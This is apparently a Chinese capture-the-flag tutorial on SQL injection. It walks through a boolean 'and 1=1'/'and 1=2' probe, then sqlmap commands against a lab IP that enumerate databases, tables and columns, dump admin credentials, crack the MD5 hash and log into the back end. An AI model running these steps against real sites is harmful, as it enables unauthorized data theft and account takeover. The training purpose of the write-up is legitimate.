注入图文详解目录发现

sqlmap注入图文详解

数据库教程 2021-10-08 16:37:10 35

导读

目录1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。2.现在拿出我们的kali工具,sqlmap进行注入测试。3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单4.接下来……
目录

1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。
2.现在拿出我们的kali工具,sqlmap进行注入测试。3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单4.接下来查一下member中存在哪些列。5.上一步可以看到,name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。
6.可以看到password是经过md5加密,接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址:解密网址大全点击这里
7.now! 密码已经呈现在我们眼前!!!!找到后台地址进行登录。
8.END 登录成功,拿到flag,提交。Gameover !总结


1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。

地址栏输入 and 1=1 发现页面正常显示。

sqlmap注入图文详解

再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞

sqlmap注入图文详解


2.现在拿出我们的kali工具,sqlmap进行注入测试。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

sqlmap注入图文详解


3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

sqlmap注入图文详解


4.接下来查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns

sqlmap注入图文详解


5.上一步可以看到,name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。

sqlmap注入图文详解

sqlmap注入图文详解


6.可以看到password是经过md5加密,接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址:解密网址大全点击这里

sqlmap注入图文详解


7.now! 密码已经呈现在我们眼前!!!!找到后台地址进行登录。

sqlmap注入图文详解


8.END 登录成功,拿到flag,提交。Gameover !


1253067 TFnetwork_cn